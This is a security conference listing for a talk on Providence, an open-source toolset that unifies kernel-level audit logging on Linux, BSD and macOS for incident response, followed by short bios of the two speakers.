- CXO Track
- For You
- Horror Stories from Hacker World
- Resume Clinic
- Goa 2020
Swapnil Kumbhar & Akshay Shah
Incident Response and Analysis today rely on a single source of truth: Logs. But when it comes to Linux/BSD systems or MacOS Endpoints, configuring and getting audit logs is not as straight-forward as it is in Windows. To solve this problem, we created Providence. Providence is a stack of open-source tools authored by us that aims to simplify auditing on these systems. In this presentation, we will explain how auditing at a Kernel level works in Linux and Mac systems by elaborating on Auditing Subsystem in Linux and Endpoint Security Framework in Mac. After elaborating on the usage of the userland executables for these frameworks, we will finally demonstrate how Providence can simplify the usage of these frameworks across platforms and unify data in a single dashboard. The dashboard will be used to analyze this data and detect known malicious scripts and malware on the systems.
Swapnil is a Red Teamer at Smokescreen Technologies, whose interests lie in EDR Defence Evasion, Active Directory and Powershell. In his free time, he likes to dabble with code. He has experience breaking into the most secure infrastructures in the nation.
Akshay Shah is a computer engineer who works in cybersecurity. He is one of the authors of the IEEE research paper on Lightweight Authentication and Encryption mechanisms in RPL. He loves simple automation and tries to write code on a weekday and likes to do research on weekends.